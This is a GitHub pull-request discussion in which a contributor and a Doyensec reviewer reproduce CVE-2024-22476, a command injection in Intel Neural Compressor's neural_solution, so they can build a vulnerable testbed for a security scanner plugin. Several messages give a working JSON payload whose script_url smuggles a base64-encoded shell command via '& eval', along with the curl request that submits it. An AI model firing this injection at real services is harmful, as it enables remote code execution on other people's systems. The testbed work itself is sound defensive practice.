Closed frkngksl closed 4 months ago
Hi @frkngksl. Thank you for your contribution. Can you please add the steps to reproduce the vulnerability manually? These will serve to confirm the differences between the safe and the vulnerable version of the deployed container.
Feel free to reach out ~ Leonardo (Doyensec)
Hi @leonardo-doyensec,
Sure! In the PoC, they were creating a file under the $HOME directory. Base64 encoded command is echo "Domain expansion" > ~/attack.py
. Save the following JSON to a file called task_request.json:
{
"script_url": "https://github.com/huggingface/transformers/blob/v4.21-release/examples/pytorch/text-classification & eval \"$(echo ZWNobyAiRG9tYWluIGV4cGFuc2lvbiIgPiB+L2F0dGFjay5weSI= | base64 --decode)\"",
"optimized": "False",
"arguments": [
"--model_name_or_path bert-base-cased --task_name mrpc --do_eval --output_dir result"
],
"approach": "static",
"requirements": [],
"workers": 1
}
After that just execute the following command via curl. This is only one step vulnerability.
curl -X POST -H "Content-Type: application/json" --data @./task_request.json http://127.0.0.1:8000/task/submit/
You can verify the vulnerability from the bash terminal of the container (inside of it).
PoC Video: https://drive.google.com/file/d/12DPdwmmTJhBBlX0tU-O21cidr4JGyrV7/view?usp=sharing Ref: https://huntr.com/bounties/877a517f-76ec-45be-8d3b-2b5ac471bfeb
Hi @frkngksl. I cannot reproduce the vulnerability on my side. I have deployed the vulnerable container, but if i follow your steps, the file is not created.
Hi @leonardo-doyensec ,
Sorry for the inconvinience, I guess there is an issue with the base64 command. Can you try this one? It will create attack.py under the root directory (/).
{
"script_url": "https://github.com/huggingface/transformers/blob/v4.21-release/examples/pytorch/text-classification & eval \"$(echo ZWNobyAiRG9tYWluIGV4cGFuc2lvbiIgPiAvYXR0YWNrLnB5 | base64 --decode)\"",
"optimized": "False",
"arguments": [
"--model_name_or_path bert-base-cased --task_name mrpc --do_eval --output_dir result"
],
"approach": "static",
"requirements": [],
"workers": 1
}
This is still not working on my side. I've tried to change the command to write to /tmp
, but it seems not to work either.
Hi again @leonardo-doyensec , Let me write what I'm executing in detail. After building the Dockerfile, I'm simply executing the following command:
sudo docker run --name neuralcompressor-vuln --network host -it neuralcompressor:vuln bash
This opens up a bash terminal that runs inside the container. In this one, I'm executing the following command:
neural_solution --conda_env test start
After executing the command, please don't close the terminal window, and send the command with the curl. After sending the curl command, in 3-4 seconds it should appear under the root directory. I could also record a video if you want because I don't know what the problem is.
These are the exact steps that i'm doing. However even if i get "msg":"Task submitted successfully"
the command is not executed and the file is not created.
Are the steps that you have provided, including building and deploying the container, working on your side?
Yes, it is working, I run the command several times. The screenshot that I provided is directly taken from my environment. How can I solve this problem for you? Do you have any suggestion?
I'm using Ubuntu 22.04 as the development and test environment. Also, I didn't configure Docker to run without sudo. Also, when I open a bash inside the container, it is running as root. What do you think about trying the deletion of all images in your environment and get a fresh build?
sudo docker rmi -f $(sudo docker images -aq)
sudo docker remove $(sudo docker ps -a -q)
One last note is that, this form of command execution (ie. echo
Lastly, I have pushed my built image to hub.docker so you may try this version via the following command:
sudo docker run --network host -it frkngksl/neuralcompressor:latest /bin/bash
neural_solution --conda_env test start (inside the container bash)
And once again what I have used as task_request is below. The vulnerability is triggered after the neural_solution accesses this github link. Therefore, you may want to test internet connectivity of the container.
curl -X POST -H "Content-Type: application/json" --data @./task_request.json http://127.0.0.1:8000/task/submit/
{
"script_url": "https://github.com/huggingface/transformers/blob/v4.21-release/examples/pytorch/text-classification & eval \"$(echo ZWNobyAiRG9tYWluIGV4cGFuc2lvbiIgPiAvYXR0YWNrLnB5 | base64 --decode)\"",
"optimized": "False",
"arguments": [
"--model_name_or_path bert-base-cased --task_name mrpc --do_eval --output_dir result"
],
"approach": "static",
"requirements": [],
"workers": 1
}
I hope this works for you. If not, could you send me the backend logs under the /ns_workspace/serve_log/ ?
Hi @frkngksl.
I was able to successfully reproduce the bug in the vulnerable configuration. I've removed all my other docker images and started again from scratch and i can successfully reproduce the bug. You should add the steps to reproduce the vulnerability in the testbed. It would be nice to have the correct task_request.json
file in the directory with the Dockerfiles.
Feel free to reach out ~ Leonardo (Doyensec)
Hi @leonardo-doyensec , glad to hear that! I committed the changes that you requested.
Thank you for your changes @frkngksl. I would highly recommend to put the steps to trigger the vulnerability in the vulnerable section, instead of the safe one.
Hi @leonardo-doyensec , I thought that opening a new subsection for triggering the vulnerability would be more appropriate. I sent the commit, what do you think?
Hi @leonardo-doyensec , I thought that opening a new subsection for triggering the vulnerability would be more appropriate. I sent the commit, what do you think?
Hi, i think that is crystal clear
Hi,
This is vulnerable environment for CVE-2024-22476. Related issue is https://github.com/google/tsunami-security-scanner-plugins/issues/494